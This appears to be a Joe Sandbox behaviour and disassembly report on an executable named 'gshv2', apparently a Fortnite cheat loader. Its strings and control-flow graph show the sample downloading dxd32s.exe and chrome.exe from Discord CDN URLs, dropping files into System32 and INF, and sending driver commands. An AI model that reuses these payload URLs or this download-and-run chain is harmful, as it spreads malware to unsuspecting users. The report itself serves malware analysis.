11082->11084 11085 7ff62c0d1091 11082->11085 11083->11079 11086 7ff62c0d10b9 11085->11086 11087 7ff62c0d10e3 _invalid_parameter_noinfo_noreturn 11085->11087 11088 7ff62c0cfbf8 free 11086->11088 11088->11084 10864 7ff62c0ae380 10865 7ff62c0ae3d0 10864->10865 10873 7ff62c0b0000 10865->10873 10867 7ff62c0aecc4 10868 7ff62c0aee0e 10867->10868 10869 7ff62c0aedcc 10867->10869 10872 7ff62c0aed32 10867->10872 10871 7ff62c0ace70 5 API calls 10868->10871 10868->10872 10870 7ff62c0ac510 2 API calls 10869->10870 10870->10872 10871->10872 10876 7ff62c0b0023 10873->10876 10874 7ff62c0b00f1 10874->10867 10875 7ff62c0acd10 5 API calls 10877 7ff62c0b04ed 10875->10877 10876->10874 10876->10875 10880 7ff62c0b04f5 10876->10880 10879 7ff62c0ac510 2 API calls 10877->10879 10878 7ff62c0b05cc 10878->10867 10879->10880 10880->10878 10881 7ff62c0ac510 2 API calls 10880->10881 10881->10878 10882 7ff62c0b1f80 10883 7ff62c0b1fc4 10882->10883 10884 7ff62c0b1f9b 10882->10884 10885 7ff62c0b25e0 3 API calls 10884->10885 10885->10883 11256 7ff62c0b1c80 11257 7ff62c0b1cae ImmGetContext 11256->11257 11258 7ff62c0b1cf1 11256->11258 11257->11258 11259 7ff62c0b1cc7 ImmSetCompositionWindow ImmReleaseContext 11257->11259 11260 7ff62c0cf650 8 API calls 11258->11260 11259->11258 11261 7ff62c0b1d06 11260->11261 11092 7ff62c0c6000 __std_exception_destroy 11262 7ff62c0bb080 11263 7ff62c0bb0a0 11262->11263 11264 7ff62c0bb113 11263->11264 11265 7ff62c0b25e0 3 API calls 11263->11265 11265->11264 11093 7ff62c0a1000 11094 7ff62c0cea30 8 API calls 11093->11094 11095 7ff62c0a101d 11094->11095 11427 7ff62c0a8100 11428 7ff62c0a8122 11427->11428 11429 7ff62c0a8128 malloc 11427->11429 11428->11429 11430 7ff62c0a815a 11429->11430 11433 7ff62c0a8168 11429->11433 11449 7ff62c0a42d0 11430->11449 11440 7ff62c0a81db 11433->11440 11457 7ff62c0b2390 11433->11457 11434 7ff62c0a843d 11435 7ff62c0a8461 11434->11435 11436 7ff62c0a8504 11434->11436 11438 7ff62c0a8465 11435->11438 11439 7ff62c0a84a8 11435->11439 11437 7ff62c0a852c 11436->11437 11444 7ff62c0b2200 3 API calls 11436->11444 11441 7ff62c0a848d 11438->11441 11447 7ff62c0b2200 3 API calls 11438->11447 11442 7ff62c0a84d0 11439->11442 11448 7ff62c0b2200 3 API calls 11439->11448 11440->11434 11443 7ff62c0b2200 3 API calls 11440->11443 11445 7ff62c0a84d8 memcpy 11442->11445 11446 7ff62c0a84ed 11442->11446 11443->11434 11444->11437 11445->11446 11447->11441 11448->11442 11450 7ff62c0a433b 11449->11450 11451 7ff62c0bad00 15 API calls 11450->11451 11452 7ff62c0a44b3 11451->11452 11453 7ff62c0a44fc malloc memcpy 11452->11453 11455 7ff62c0a452b 11453->11455 11454 7ff62c0a4562 11454->11433 11455->11454 11456 7ff62c0b2540 3 API calls 11455->11456 11456->11454 11458 7ff62c0b23cb 11457->11458 11462 7ff62c0b2451 11457->11462 11461 7ff62c0b23fc malloc 11458->11461 11458->11462 11459 7ff62c0b2467 memcpy 11460 7ff62c0b247b 11459->11460 11460->11440 11461->11462 11463 7ff62c0b241b memcpy 11461->11463 11462->11459 11462->11460 11464 7ff62c0b2445 free 11463->11464 11465 7ff62c0b2433 11463->11465 11464->11462 11465->11464 11470 7ff62c0d0f00 11471 7ff62c0d0f35 __current_exception __current_exception_context terminate 11470->11471 11472 7ff62c0d0f29 11470->11472 11471->11472 10887 7ff62c0b1bb0 OpenClipboard 10888 7ff62c0b1c78 10887->10888 10892 7ff62c0b1bc9 10887->10892 10889 7ff62c0b1c0c GlobalAlloc 10890 7ff62c0b1c68 CloseClipboard 10889->10890 10891 7ff62c0b1c27 GlobalLock 10889->10891 10890->10888 10896 7ff62c0a32b0 10891->10896 10892->10889 10894 7ff62c0b1c3d GlobalUnlock EmptyClipboard SetClipboardData 10894->10890 10895 7ff62c0b1c5f GlobalFree 10894->10895 10895->10890 10897 7ff62c0a32dd 10896->10897 10897->10894 11473 7ff62c0b1730 11482 7ff62c0a1ba0 11473->11482 11475 7ff62c0b1759 11476 7ff62c0b175e 11475->11476 11477 7ff62c0a1ba0 __stdio_common_vsscanf 11475->11477 11478 7ff62c0b1798 11477->11478 11479 7ff62c0b179d 11478->11479 11480 7ff62c0a1ba0 __stdio_common_vsscanf 11478->11480 11481 7ff62c0b17e9 11480->11481 11485 7ff62c0a1b90 11482->11485 11484 7ff62c0a1bc6 __stdio_common_vsscanf 11484->11475 11485->11484 9041 7ff62c0c73b0 9042 7ff62c0c73b4 GetAsyncKeyState 9041->9042 9043 7ff62c0c73d1 SleepEx 9042->9043 9044 7ff62c0c73c3 9042->9044 9043->9042 9044->9043 10898 7ff62c0c5fb0 __std_exception_destroy 10899 7ff62c0c5fe5 10898->10899 10900 7ff62c0c5fd8 10898->10900 10901 7ff62c0cfbf8 free 10900->10901 10901->10899 10902 7ff62c0d07b4 10903 7ff62c0d07ec __GSHandlerCheckCommon 10902->10903 10904 7ff62c0d0807 __CxxFrameHandler4 10903->10904 10905 7ff62c0d0818 10903->10905 10904->10905 11486 7ff62c0a2530 11487 7ff62c0a255c 11486->11487 11489 7ff62c0a253d free 11486->11489 11489->11487 10906 7ff62c0cedb0 10909 7ff62c0a1b80 10906->10909 10908 7ff62c0cedd6 __stdio_common_vsprintf_s 10909->10908 10910 7ff62c0cebb0 ?_Xout_of_range@std@@YAXPEBD 11490 7ff62c0c2b27 LoadCursorA SetCursor 11103 7ff62c0ad220 11104 7ff62c0ad248 11103->11104 11106 7ff62c0ad255 11104->11106 11108 7ff62c0ad409 11104->11108 11110 7ff62c0acfd0 11106->11110 11107 7ff62c0acfd0 8 API calls 11109 7ff62c0ad3bc 11107->11109 11108->11107 11108->11109 11113 7ff62c0ad04e 11110->11113 11111 7ff62c0cf650 8 API calls 11112 7ff62c0ad166 11111->11112 11112->11109 11113->11111 10915 7ff62c0d0fa3 _seh_filter_exe 11274 7ff62c0c66a0 11275 7ff62c0c675d 11274->11275 11276 7ff62c0bd670 23 API calls 11275->11276 11277 7ff62c0c67cd 11276->11277 11278 7ff62c0bd670 23 API calls 11277->11278 11279 7ff62c0c6842 11278->11279 11280 7ff62c0bd670 23 API calls 11279->11280 11281 7ff62c0c68c3 11280->11281 11282 7ff62c0bd670 23 API calls 11281->11282 11283 7ff62c0c6930 11282->11283 11284 7ff62c0bd670 23 API calls 11283->11284 11285 7ff62c0c69b1 11284->11285 11286 7ff62c0bd670 23 API calls 11285->11286 11287 7ff62c0c6a1d 11286->11287 11288 7ff62c0bd670 23 API calls 11287->11288 11289 7ff62c0c6a89 11288->11289 11290 7ff62c0bd670 23 API calls 11289->11290 11291 7ff62c0c6af6 11290->11291 11494 7ff62c0b611f 11495 7ff62c0b60bc 11494->11495 11496 7ff62c0cf650 8 API calls 11495->11496 11497 7ff62c0b711f 11496->11497 10916 7ff62c0cfda0 10920 7ff62c0d027c SetUnhandledExceptionFilter 10916->10920 11117 7ff62c0ab622 11118 7ff62c0ab626 11117->11118 11119 7ff62c0b2200 3 API calls 11118->11119 11120 7ff62c0ab7ad 11118->11120 11119->11120 11121 7ff62c0ab82a 11120->11121 11123 7ff62c0b2540 3 API calls 11120->11123 11122 7ff62c0ab857 11121->11122 11124 7ff62c0b2540 3 API calls 11121->11124 11125 7ff62c0ab888 11122->11125 11126 7ff62c0b2540 3 API calls 11122->11126 11123->11121 11124->11122 11147 7ff62c0b1d50 11125->11147 11126->11125 11128 7ff62c0ab9bc 11129 7ff62c0ac510 2 API calls 11128->11129 11132 7ff62c0aba08 11128->11132 11129->11132 11130 7ff62c0ab8be 11130->11128 11131 7ff62c0b2540 3 API calls 11130->11131 11131->11128 11133 7ff62c0abedc 11132->11133 11137 7ff62c0abaf5 11132->11137 11156 7ff62c0c41a0 11132->11156 11135 7ff62c0bb300 3 API calls 11133->11135 11144 7ff62c0ac1d5 11135->11144 11136 7ff62c0a3870 8 API calls 11138 7ff62c0abd7f 11136->11138 11137->11136 11139 7ff62c0abd99 11137->11139 11138->11139 11140 7ff62c0b1050 7 API calls 11138->11140 11139->11133 11141 7ff62c0a3870 8 API calls 11139->11141 11140->11139 11142 7ff62c0abec4 11141->11142 11142->11133 11143 7ff62c0b1050 7 API calls 11142->11143 11143->11133 11145 7ff62c0cf650 8 API calls 11144->11145 11146 7ff62c0ac360 11145->11146 11148 7ff62c0b1d64 11147->11148 11149 7ff62c0b1e23 11147->11149 11150 7ff62c0b1e12 11148->11150 11151 7ff62c0b1d98 malloc 11148->11151 11149->11130 11150->11130 11152 7ff62c0b1df5 11151->11152 11153 7ff62c0b1dbb memcpy 11151->11153 11152->11130 11154 7ff62c0b1de9 free 11153->11154 11155 7ff62c0b1dd7 11153->11155 11154->11152 11155->11154 11157 7ff62c0c4218 11156->11157 11158 7ff62c0c3850 3 API calls 11157->11158 11159 7ff62c0c423a 11158->11159 11160 7ff62c0c432c 11159->11160 11161 7ff62c0bde90 23 API calls 11159->11161 11166 7ff62c0a3e00 11160->11166 11161->11160 11163 7ff62c0c43b1 11163->11137 11165 7ff62c0a50b0 2 API calls 11165->11163 11167 7ff62c0a3e7f 11166->11167 11170 7ff62c0bdc60 11167->11170 11171 7ff62c0a3fc3 11170->11171 11174 7ff62c0bdc89 11170->11174 11171->11163 11171->11165 11172 7ff62c0bdd11 11173 7ff62c0bdd50 11172->11173 11179 7ff62c0b2200 3 API calls 11172->11179 11177 7ff62c0bc910 18 API calls 11173->11177 11175 7ff62c0b2200 3 API calls 11174->11175 11176 7ff62c0bdccf 11174->11176 11175->11176 11176->11172 11178 7ff62c0b2200 3 API calls 11176->11178 11180 7ff62c0bdd78 11177->11180 11178->11172 11179->11173 11180->11171 11181 7ff62c0b2200 3 API calls 11180->11181 11181->11171 10921 7ff62c0b6198 10924 7ff62c0b60bc 10921->10924 10922 7ff62c0cf650 8 API calls 10923 7ff62c0b711f 10922->10923 10924->10921 10924->10922 11292 7ff62c0b6299 11293 7ff62c0b62a3 11292->11293 11294 7ff62c0cf650 8 API calls 11293->11294 11296 7ff62c0b63f3 11293->11296 11295 7ff62c0b711f 11294->11295 10925 7ff62c0ac19d 10926 7ff62c0ac1a6 10925->10926 10927 7ff62c0bb300 3 API calls 10926->10927 10928 7ff62c0ac1d5 10927->10928 10929 7ff62c0cf650 8 API calls 10928->10929 10930 7ff62c0ac360 10929->10930

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 7ff62c0ccfd0-7ff62c0cd25c URLDownloadToFileA call 7ff62c0ce970 * 4 call 7ff62c0cee10 call 7ff62c0cee70 * 3 call 7ff62c0ce910 * 3 call 7ff62c0ce970 * 3 call 7ff62c0ceed0 call 7ff62c0cee70 * 3 call 7ff62c0ce910 * 3 SleepEx call 7ff62c0ceba0 system CreateThread URLDownloadToFileW call 7ff62c0ce830 CreateFileW 47 7ff62c0cd25e-7ff62c0cd2c8 GetStdHandle SetConsoleTextAttribute call 7ff62c0ce040 call 7ff62c0c5ef0 SleepEx exit 0->47 48 7ff62c0cd2c9-7ff62c0cd2d1 0->48 47->48 50 7ff62c0cdfa6-7ff62c0ce03e call 7ff62c0ce910 * 9 call 7ff62c0cf650 48->50 51 7ff62c0cd2d7-7ff62c0cd2dc 48->51 53 7ff62c0cd2e0-7ff62c0cd3fe call 7ff62c0ccd10 SetConsoleTitleA GetLastError FormatMessageA GetStdHandle SetConsoleTextAttribute call 7ff62c0ce800 call 7ff62c0c5ef0 Sleep system call 7ff62c0ce7e0 call 7ff62c0ceba0 system call 7ff62c0ce7b0 FindWindowA GetWindowThreadProcessId GetWindowRect 51->53 81 7ff62c0cd4e4-7ff62c0cd599 GetStdHandle SetConsoleTextAttribute call 7ff62c0ce800 call 7ff62c0c5ef0 Sleep system call 7ff62c0ce7b0 FindWindowA GetWindowThreadProcessId GetWindowRect 53->81 82 7ff62c0cd404-7ff62c0cd4df DeviceIoControl GetStdHandle SetConsoleTextAttribute call 7ff62c0ce780 call 7ff62c0c5ef0 call 7ff62c0ce170 call 7ff62c0cc890 CreateThread CloseHandle call 7ff62c0ce300 53->82 102 7ff62c0cd67f-7ff62c0cd71d GetStdHandle SetConsoleTextAttribute call 7ff62c0ce800 call 7ff62c0c5ef0 Sleep system GetWindowThreadProcessId GetWindowRect 81->102 103 7ff62c0cd59f-7ff62c0cd67a DeviceIoControl GetStdHandle SetConsoleTextAttribute call 7ff62c0ce780 call 7ff62c0c5ef0 call 7ff62c0ce170 call 7ff62c0cc890 CreateThread CloseHandle call 7ff62c0ce300 81->103 82->81 115 7ff62c0cd803-7ff62c0cd8a1 GetStdHandle SetConsoleTextAttribute call 7ff62c0ce800 call 7ff62c0c5ef0 Sleep system GetWindowThreadProcessId GetWindowRect 102->115 116 7ff62c0cd723-7ff62c0cd7fe DeviceIoControl GetStdHandle SetConsoleTextAttribute call 7ff62c0ce780 call 7ff62c0c5ef0 call 7ff62c0ce170 call 7ff62c0cc890 CreateThread CloseHandle call 7ff62c0ce300 102->116 103->102 130 7ff62c0cd987-7ff62c0cda25 GetStdHandle SetConsoleTextAttribute call 7ff62c0ce800 call 7ff62c0c5ef0 Sleep system GetWindowThreadProcessId GetWindowRect 115->130 131 7ff62c0cd8a7-7ff62c0cd982 DeviceIoControl GetStdHandle SetConsoleTextAttribute call 7ff62c0ce780 call 7ff62c0c5ef0 call 7ff62c0ce170 call 7ff62c0cc890 CreateThread CloseHandle call 7ff62c0ce300 115->131 116->115 145 7ff62c0cdb0b-7ff62c0cdba9 GetStdHandle SetConsoleTextAttribute call 7ff62c0ce800 call 7ff62c0c5ef0 Sleep system GetWindowThreadProcessId GetWindowRect 130->145 146 7ff62c0cda2b-7ff62c0cdb06 DeviceIoControl GetStdHandle SetConsoleTextAttribute call 7ff62c0ce780 call 7ff62c0c5ef0 call 7ff62c0ce170 call 7ff62c0cc890 CreateThread CloseHandle call 7ff62c0ce300 130->146 131->130 160 7ff62c0cdc8f-7ff62c0cdd2d GetStdHandle SetConsoleTextAttribute call 7ff62c0ce800 call 7ff62c0c5ef0 Sleep system GetWindowThreadProcessId GetWindowRect 145->160 161 7ff62c0cdbaf-7ff62c0cdc8a DeviceIoControl GetStdHandle SetConsoleTextAttribute call 7ff62c0ce780 call 7ff62c0c5ef0 call 7ff62c0ce170 call 7ff62c0cc890 CreateThread CloseHandle call 7ff62c0ce300 145->161 146->145 175 7ff62c0cdd33-7ff62c0cde0f DeviceIoControl GetStdHandle SetConsoleTextAttribute call 7ff62c0ce780 call 7ff62c0c5ef0 call 7ff62c0ce170 call 7ff62c0cc890 CreateThread CloseHandle call 7ff62c0ce300 160->175 176 7ff62c0cde14-7ff62c0cdeb2 GetStdHandle SetConsoleTextAttribute call 7ff62c0ce800 call 7ff62c0c5ef0 Sleep system GetWindowThreadProcessId GetWindowRect 160->176 161->160 175->176 190 7ff62c0cdf98-7ff62c0cdfa0 176->190 191 7ff62c0cdeb8-7ff62c0cdf93 DeviceIoControl GetStdHandle SetConsoleTextAttribute call 7ff62c0ce780 call 7ff62c0c5ef0 call 7ff62c0ce170 call 7ff62c0cc890 CreateThread CloseHandle call 7ff62c0ce300 176->191 190->50 190->53 191->190
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: Window$Handle$ConsoleThread$AttributeText$Create$RectSleepsystem$CloseControlDeviceProcess$ClientMessageexit$File$AsyncDownloadFindPerformanceQueryScreenState$AreaClassCounterCreate9CursorDestroyDirect3DispatchErrorExtendForegroundFormatFrameFrequencyIntoLastLongPeekPostProcQuitRegisterShowTitleTranslateUpdate__acrt_iob_func__stdio_common_vfprintf_invalid_parameter_noinfo_noreturnfree
                              • String ID: ($,0\$.exe$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$03:21:08$3lL$C:\Windows\INF\Hook64.exe$C:\Windows\System32\$C:\Windows\System32\dxd32s.exe$CLS$E/H/$F/T/$Fortnite $Sep 14 2022$dxd32s$https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exe$https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe$kM[I$x/y/
                              • API String ID: 2141492094-1272919877
                              • Opcode ID: aff7b389b3a8d752304e35c1caf816fbdf3f9c0eab3bd37aad2f3f4083a9742f
                              • Instruction ID: 8d28c15f3c2b7c601c0610db41e22735e68a7fb1986130c50233a916e569e15b
                              • Opcode Fuzzy Hash: aff7b389b3a8d752304e35c1caf816fbdf3f9c0eab3bd37aad2f3f4083a9742f
                              • Instruction Fuzzy Hash: DEA26F32E08B8285FB00DB64EC441BD3761FF88764F404535EA5D92AA9DF3DE649C752

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 260 7ff62c0c73b0 261 7ff62c0c73b4-7ff62c0c73c1 GetAsyncKeyState 260->261 262 7ff62c0c73d1-7ff62c0c73dc SleepEx 261->262 263 7ff62c0c73c3-7ff62c0c73ca 261->263 262->261 263->262
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: AsyncSleepState
                              • String ID:
                              • API String ID: 21662186-0
                              • Opcode ID: c04e03b3ab2296f50d0e424dbbbb252c5912ebf8b0a9f1bcc88de5fb0d83bd2b
                              • Instruction ID: e6d76131ffbff6c16fa2b186df40023d2ba7f01417147dc370a850f17921cf65
                              • Opcode Fuzzy Hash: c04e03b3ab2296f50d0e424dbbbb252c5912ebf8b0a9f1bcc88de5fb0d83bd2b
                              • Instruction Fuzzy Hash: F7D0C924D4C28792FF191B24AC183381A54EF17761F1400B8C55E822E1CF2E7988C323

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                              • String ID:
                              • API String ID: 120244420-0
                              • Opcode ID: d89613799273177604e8257d9d8096a4adfa473315e9760406a7edf7c72bfb88
                              • Instruction ID: 1d31b8a4578ae7796749932ab44f71188986f3b2d9a5e27dad730bf64e065950
                              • Opcode Fuzzy Hash: d89613799273177604e8257d9d8096a4adfa473315e9760406a7edf7c72bfb88
                              • Instruction Fuzzy Hash: 76311B21E0820382FE14AB24AC517BD5791EF867A8F444035E94DC72D7DF6FEA4586A3

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: __acrt_iob_func__stdio_common_vfprintf
                              • String ID:
                              • API String ID: 2168557111-0
                              • Opcode ID: 590d650156d2139e1e28312ff60c172adc136865ae5468f88b51044aa0b75e22
                              • Instruction ID: 84f142ad0e966f49695c1d9ff1ad18d3fa5cdd9d33a244ca9ef9b56816c8eb45
                              • Opcode Fuzzy Hash: 590d650156d2139e1e28312ff60c172adc136865ae5468f88b51044aa0b75e22
                              • Instruction Fuzzy Hash: F2E03072608B8182D6008B50FC0455AB3A4FBD87D5F404035EF8C47A24DF7CC5A4CB41

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 264 7ff62c0c9f80-7ff62c0c9fc0 265 7ff62c0c9fc2 call 7ff62c0c2980 264->265 266 7ff62c0c9fc7-7ff62c0ca09d GetClientRect QueryPerformanceCounter GetKeyState * 3 264->266 265->266 268 7ff62c0ca0ce-7ff62c0ca0e8 GetActiveWindow 266->268 269 7ff62c0ca09f-7ff62c0ca0c8 ClientToScreen SetCursorPos 266->269 270 7ff62c0ca0ea-7ff62c0ca0f6 GetCursorPos 268->270 271 7ff62c0ca126-7ff62c0ca12d 268->271 269->268 270->271 274 7ff62c0ca0f8-7ff62c0ca10b ScreenToClient 270->274 272 7ff62c0ca12f-7ff62c0ca134 271->272 273 7ff62c0ca136-7ff62c0ca13d 271->273 275 7ff62c0ca143-7ff62c0ca149 272->275 273->275 274->271 276 7ff62c0ca10d-7ff62c0ca121 274->276 277 7ff62c0ca14b-7ff62c0ca151 call 7ff62c0c2ad0 275->277 278 7ff62c0ca156-7ff62c0ca180 call 7ff62c0a5e00 275->278 276->271 277->278 282 7ff62c0cc580-7ff62c0cc5ac 278->282 283 7ff62c0ca186-7ff62c0ca383 GetCursorPos call 7ff62c0a34f0 call 7ff62c0bde90 call 7ff62c0a95b0 call 7ff62c0c37d0 278->283 284 7ff62c0cc5c5-7ff62c0cc5c9 282->284 285 7ff62c0cc5ae 282->285 333 7ff62c0ca41b-7ff62c0ca43b call 7ff62c0c3de0 283->333 334 7ff62c0ca389-7ff62c0ca3a9 283->334 288 7ff62c0cc5e2-7ff62c0cc5e5 284->288 289 7ff62c0cc5cb 284->289 285->284 287 7ff62c0cc5b0-7ff62c0cc5c0 285->287 291 7ff62c0cc66e-7ff62c0cc683 287->291 294 7ff62c0cc5f5-7ff62c0cc5f8 288->294 295 7ff62c0cc5e7 288->295 289->288 292 7ff62c0cc5cd-7ff62c0cc5dd 289->292 300 7ff62c0cc693-7ff62c0cc697 291->300 301 7ff62c0cc685 291->301 292->291 296 7ff62c0cc60e-7ff62c0cc615 294->296 297 7ff62c0cc5fa 294->297 295->294 299 7ff62c0cc5e9-7ff62c0cc5f3 295->299 306 7ff62c0cc62b-7ff62c0cc632 296->306 307 7ff62c0cc617 296->307 297->296 303 7ff62c0cc5fc-7ff62c0cc60c 297->303 299->291 304 7ff62c0cc6a7-7ff62c0cc6aa 300->304 305 7ff62c0cc699 300->305 301->300 302 7ff62c0cc687-7ff62c0cc691 301->302 309 7ff62c0cc6e4-7ff62c0cc779 call 7ff62c0c8390 call 7ff62c0a70a0 302->309 303->291 312 7ff62c0cc6ac 304->312 313 7ff62c0cc6b8-7ff62c0cc6bb 304->313 305->304 310 7ff62c0cc69b-7ff62c0cc6a5 305->310 314 7ff62c0cc642-7ff62c0cc649 306->314 315 7ff62c0cc634 306->315 307->306 311 7ff62c0cc619-7ff62c0cc629 307->311 373 7ff62c0cc7aa-7ff62c0cc7cc 309->373 374 7ff62c0cc77b-7ff62c0cc7a1 call 7ff62c0a7530 call 7ff62c0c20b0 309->374 310->309 311->291 312->313 318 7ff62c0cc6ae-7ff62c0cc6b6 312->318 320 7ff62c0cc6bd 313->320 321 7ff62c0cc6c9-7ff62c0cc6d0 313->321 322 7ff62c0cc64b 314->322 323 7ff62c0cc659-7ff62c0cc660 314->323 315->314 319 7ff62c0cc636-7ff62c0cc640 315->319 327 7ff62c0cc6dc 318->327 319->291 320->321 328 7ff62c0cc6bf-7ff62c0cc6c7 320->328 321->309 330 7ff62c0cc6d2 321->330 322->323 329 7ff62c0cc64d-7ff62c0cc657 322->329 323->291 331 7ff62c0cc662 323->331 327->309 328->327 329->291 330->309 335 7ff62c0cc6d4 330->335 331->291 336 7ff62c0cc664 331->336 344 7ff62c0ca455-7ff62c0ca4cd 333->344 345 7ff62c0ca43d-7ff62c0ca44b 333->345 338 7ff62c0ca3ad call 7ff62c0b2100 334->338 335->327 336->291 340 7ff62c0ca3b2-7ff62c0ca419 call 7ff62c0c3de0 338->340 340->344 347 7ff62c0ca4d3-7ff62c0ca4f3 344->347 348 7ff62c0ca565-7ff62c0ca585 call 7ff62c0c3de0 344->348 345->344 351 7ff62c0ca4f7 call 7ff62c0b2100 347->351 354 7ff62c0ca59b-7ff62c0ca614 348->354 355 7ff62c0ca587-7ff62c0ca595 348->355 353 7ff62c0ca4fc-7ff62c0ca563 call 7ff62c0c3de0 351->353 353->354 359 7ff62c0ca61a-7ff62c0ca63a 354->359 360 7ff62c0ca6ac-7ff62c0ca6cc call 7ff62c0c3de0 354->360 355->354 361 7ff62c0ca63e call 7ff62c0b2100 359->361 368 7ff62c0ca6ce-7ff62c0ca6dc 360->368 369 7ff62c0ca6e6-7ff62c0ca765 360->369 364 7ff62c0ca643-7ff62c0ca6aa call 7ff62c0c3de0 361->364 364->369 368->369 370 7ff62c0ca76b-7ff62c0ca78b 369->370 371 7ff62c0ca7fd-7ff62c0ca81d call 7ff62c0c3de0 369->371 375 7ff62c0ca78f call 7ff62c0b2100 370->375 386 7ff62c0ca81f-7ff62c0ca82d 371->386 387 7ff62c0ca837-7ff62c0ca862 371->387 384 7ff62c0cc7d2-7ff62c0cc7e4 373->384 385 7ff62c0cc86c-7ff62c0cc88c call 7ff62c0cf650 373->385 374->373 378 7ff62c0ca794-7ff62c0ca7fb call 7ff62c0c3de0 375->378 378->387 384->385 401 7ff62c0cc7ea-7ff62c0cc7f1 384->401 386->387 390 7ff62c0cafe0-7ff62c0caff0 387->390 391 7ff62c0ca868-7ff62c0ca91d call 7ff62c0a2e50 387->391 393 7ff62c0cb635-7ff62c0cb63c 390->393 394 7ff62c0caff6-7ff62c0cb0ab call 7ff62c0a2e50 390->394 408 7ff62c0ca925-7ff62c0ca92b 391->408 409 7ff62c0ca91f 391->409 398 7ff62c0cb642-7ff62c0cb6f7 call 7ff62c0a2e50 393->398 399 7ff62c0cbe04 393->399 411 7ff62c0cb0b3-7ff62c0cb0b9 394->411 412 7ff62c0cb0ad 394->412 421 7ff62c0cb6ff-7ff62c0cb705 398->421 422 7ff62c0cb6f9 398->422 407 7ff62c0cbe0d-7ff62c0cbe14 399->407 405 7ff62c0cc7f3-7ff62c0cc7fd 401->405 406 7ff62c0cc850-7ff62c0cc867 call 7ff62c0c2980 401->406 413 7ff62c0cc7ff-7ff62c0cc805 405->413 414 7ff62c0cc80c-7ff62c0cc816 405->414 406->385 415 7ff62c0cc553-7ff62c0cc578 call 7ff62c0a7e10 call 7ff62c0ac370 407->415 416 7ff62c0cbe1a-7ff62c0cbecf call 7ff62c0a2e50 407->416 417 7ff62c0ca934-7ff62c0cafdb call 7ff62c0a7b60 call 7ff62c0c37d0 call 7ff62c0ac980 call 7ff62c0c6b50 call 7ff62c0c5330 call 7ff62c0c37d0 * 12 408->417 418 7ff62c0ca92d 408->418 409->408 423 7ff62c0cb0c2-7ff62c0cb630 call 7ff62c0a7b60 call 7ff62c0c37d0 * 12 411->423 424 7ff62c0cb0bb 411->424 412->411 413->414 427 7ff62c0cc825-7ff62c0cc836 414->427 428 7ff62c0cc818-7ff62c0cc81e 414->428 415->282 439 7ff62c0cbed1 416->439 440 7ff62c0cbed7-7ff62c0cbedd 416->440 417->390 418->417 433 7ff62c0cb70e-7ff62c0cbe02 call 7ff62c0a7b60 call 7ff62c0c37d0 * 15 421->433 434 7ff62c0cb707 421->434 422->421 423->393 424->423 431 7ff62c0cc83e-7ff62c0cc84c 427->431 432 7ff62c0cc838 427->432 428->427 431->406 432->431 433->407 434->433 439->440 446 7ff62c0cbedf 440->446 447 7ff62c0cbee6-7ff62c0cc54e call 7ff62c0a7b60 call 7ff62c0c37d0 * 14 440->447 446->447 